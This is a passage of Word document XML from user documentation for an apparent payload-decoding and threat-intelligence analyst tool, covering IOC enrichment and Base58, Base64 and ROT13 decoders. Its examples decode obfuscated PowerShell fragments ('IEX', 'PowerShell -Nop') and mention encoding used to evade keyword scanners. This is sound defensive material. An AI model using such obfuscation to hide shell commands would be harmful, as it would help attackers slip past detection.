        <w:t>Chronological event log per investigation (deterministic id = sha256(input)[:16]).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Replaying an old investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Audit trail for compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Tracking which analyst corrected which decode when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Every decode, correction, promote, benchmark, enrichment, and TAXII push auto-lands here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Add free-form notes with the composer at the bottom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: correction_flow, candidate_explorer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Threat-Intel Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: threat_intel_enrichment   ·   category: Analyst Workbench   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Look up extracted IOCs against VirusTotal, AlienVault OTX, and AbuseIPDB with 24-hour caching.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After decoding a payload that produces URLs / IPs / domains / file hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Before promoting an investigation to a customer-facing report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url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ipv4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>md5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sha1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sha256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Aggregate verdict = MAX severity across providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Missing API keys yield `no-key` verdicts (does not block other providers)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Configure API keys in Admin → Threat-Intel Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Results are cached for 24 h — set `cache_ttl_hours` to tune</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: candidate_explorer, taxii_push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Decoders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Base58 Decode (Bitcoin alphabet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: base58_decode   ·   category: Decoders   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Decode Bitcoin/IPFS-style Base58 strings.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Bitcoin/blockchain addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>IPFS content identifiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Multibase-encoded blobs where 0/O/I/l would be ambiguous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Base58 (Bitcoin)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Alphabet must be [123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Forbidden characters 0/O/I/l cap confidence at 0.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Decoded output should be UTF-8 valid or a known binary signature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Presence of 0/O/I/l — the input is NOT Base58, try Base62 or Base64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Candidate Explorer ranks Base58 above Base62/Base64 when the alphabet matches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2NEpo7TZRRrLZSi2U</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Output: Hello World!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="B45309"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Canonical acceptance-test case from the Feb-2026 spec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: base62_decode, base64_decode, candidate_explorer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Base64 Decode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: base64_decode   ·   category: Decoders   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Decode RFC 4648 Base64 payloads (standard, URL-safe, padded/unpadded).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Suspicious PowerShell -EncodedCommand blocks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Email attachment content-transfer-encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>JWT payloads and OAuth tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Embedded shellcode wrappers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Base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Base64URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>unpadded Base64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Alphabet must be [A-Za-z0-9+/=] with valid padding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Length must be a multiple of 4 (with '=' padding)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Decoded output must be UTF-8 valid or match a known file signature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Invalid padding — supply `=` characters until length % 4 == 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Truncated payload — output ends mid-word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Magic Decoder automatically chains Base64 → UTF-16LE detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>For URL-safe Base64 use the `base64url-decode` operation instead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SQBFAFgA</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Output: IEX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="B45309"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>UTF-16LE PowerShell "Invoke-Expression" alias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: base64url_decode, base58_decode, magic_decoder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ROT13 / ROT-N / Caesar shift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id: rot13   ·   category: Decoders   ·   audience: user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reverse a mono-alphabetic letter-shift cipher (defaults to shift=13).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Obfuscated PowerShell command names (CbjreFuryy -Abc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CTF / puzzle payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Historic malware that uses trivial substitution to bypass keyword scanners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ROT13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ROT-N (1-25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Atbash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Requires linguistic-score improvement of the DECODED text vs the input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Marginal improvement (&lt;0.30) is flagged; below 0.15 the transform is rejected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Applying ROT13 to random-looking text with no linguistic content — gets rejected as spurious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reasoning engine tries every ROT-N (1..25) automatically and picks the one with the highest English density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CbjreFuryy -Abc</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Output: PowerShell -Nop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="B45309"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Analyst-linguistic case — ROT13 fires because the output contains a shell token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Related: candidate_explorer, magic_decoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="65379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